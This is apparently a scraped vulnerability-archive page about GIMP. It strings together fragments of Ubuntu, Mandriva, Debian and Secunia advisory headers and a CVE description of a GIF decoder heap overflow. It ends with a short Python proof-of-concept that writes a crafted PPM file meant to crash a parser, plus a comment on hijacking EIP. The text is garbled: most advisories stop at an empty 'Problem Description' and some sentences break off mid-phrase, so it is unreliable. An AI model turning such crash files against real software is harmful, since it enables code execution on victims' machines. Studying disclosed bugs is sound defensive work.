gimp
===========================================================
Ubuntu Security Notice USN-1109-1 April 13, 2011
gimp vulnerabilities
CVE-2010-4540, CVE-2010-4541, CVE-2010-4542, CVE-2010-4543
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 8.04 LTS
Ubuntu 9.10
Mandriva Linux Security Advisory MDVSA-2011:103
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : May 29, 2011
Affected: 2009.0, 2010.1, Enterprise Server 5.0
_______________________________________________________________________
Problem Description:
===========================================================
Ubuntu Security Notice USN-880-1 January 07, 2010
gimp vulnerabilities
CVE-2009-1570, CVE-2009-3909
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 8.04 LTS
Ubuntu 8.10
======================================================================
Secunia Research 17/11/2009
- Gimp PSD Image Parsing Integer Overflow Vulnerability -
======================================================================
Table of Contents
Affected Software....................................................1
===========================================================
Ubuntu Security Notice USN-494-1 August 02, 2007
gimp vulnerability
CVE-2006-4519
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 6.10
======================================================================
Secunia Research 12/11/2009
- Gimp BMP Image Parsing Integer Overflow Vulnerability -
======================================================================
Table of Contents
Affected Software....................................................1
Debian Security Advisory DSA-2426-1 security@debian.org
http://www.debian.org/security/ Florian Weimer
March 06, 2012 http://www.debian.org/security/faq
- -------------------------------------------------------------------------
Package : gimp
Vulnerability : several
Problem type : local
Debian-specific: no
CVE ID : CVE-2010-4540 CVE-2010-4541 CVE-2010-4542 CVE-2010-4543
CVE-2011-1782 CVE-2011-2896
Mandriva Linux Security Advisory MDVSA-2009:332-1
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : April 28, 2010
Affected: 2009.0
_______________________________________________________________________
Problem Description:
Mandriva Linux Security Advisory MDVSA-2009:332
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : December 11, 2009
Affected: 2009.1, 2010.0
_______________________________________________________________________
Problem Description:
Mandriva Linux Security Advisory MDVSA-2011:110
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : June 17, 2011
Affected: 2009.0, Enterprise Server 5.0
_______________________________________________________________________
Problem Description:
Mandriva Linux Security Advisory MDKSA-2007:170
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : August 23, 2007
Affected: 2007.0, 2007.1, Corporate 3.0
_______________________________________________________________________
Problem Description:
Mandriva Linux Security Advisory MDVSA-2009:296
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : November 13, 2009
Affected: 2009.1, 2010.0, Enterprise Server 5.0
_______________________________________________________________________
Problem Description:
Mandriva Linux Security Advisory MDVSA-2011:167
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : November 4, 2011
Affected: 2010.1, 2011., Enterprise Server 5.0
_______________________________________________________________________
Problem Description:
Mandriva Linux Security Advisory MDVSA-2009:296-1
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : December 11, 2009
Affected: 2008.0
_______________________________________________________________________
Problem Description:
Published: 2007-08-01
Rating: Minor
Updated Versions:
gimp=/foresight.rpath.org@fl:1-devel//1/2.3.19-1-1
group-dist=/foresight.rpath.org@fl:1-devel//1/1.3.2-0.6-5
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2949
http://issues.foresightlinux.org/browse/FL-457
Background
==========
LittleCMS, or short lcms, is a color management system for working with
ICC profiles. It is used by many applications including GIMP and
Firefox.
Affected packages
=================
(CVE-2010-2432).
The LZW decompressor in the LWZReadByte function in giftoppm.c in
the David Koblas GIF decoder in PBMPLUS, as used in the gif_read_lzw
function in filter/image-gif.c in CUPS before 1.4.7, the LZWReadByte
function in plug-ins/common/file-gif-load.c in GIMP 2.6.11 and earlier,
the LZWReadByte function in img/gifread.c in XPCE in SWI-Prolog 5.10.4
and earlier, and other products, does not properly handle code words
that are absent from the decompression table when encountered, which
allows remote attackers to trigger an infinite loop or a heap-based
buffer overflow, and possibly execute arbitrary code, via a crafted
errors as well as dangerous memory leaks. Decoding a specially crafted
image file will result in unexpected process termination, Denial Of
Service conditions or arbitrary code execution due to stack overflow.
LittleCMS is used by several Open Source projects including OpenJDK,
Firefox and GIMP.
Affected version:
LittleCMS <= 1.17
Desktop i386
import struct
w = open("crash.ppm","wb")
w.write("""P3
#CREATOR: The GIMP's PNM Filter Version
1.0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""")
# This exploit is not trivial, because the function PPM::ppmHeader()
doesn't return inmmediately, and we must modify internal variables to
cause an overwrite of a C++ string destructor executed at the end of the
function to gain control of EIP
|
